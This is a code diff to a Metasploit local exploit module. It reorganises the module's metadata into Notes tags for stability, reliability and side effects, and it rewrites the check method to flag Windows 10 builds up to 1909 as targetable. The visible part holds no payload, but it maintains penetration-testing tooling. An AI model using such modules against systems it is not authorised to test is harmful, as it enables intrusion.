@@ -44,7 +44,11 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultOptions' => {
           'DisablePayloadHandler' => true
         },
-        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -169,10 +173,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Build Number = #{build_num}")
-    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
+    version = get_version_info
+
+    vprint_status("OS version: #{version}")
+    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909)
 
     return Exploit::CheckCode::Safe
   end
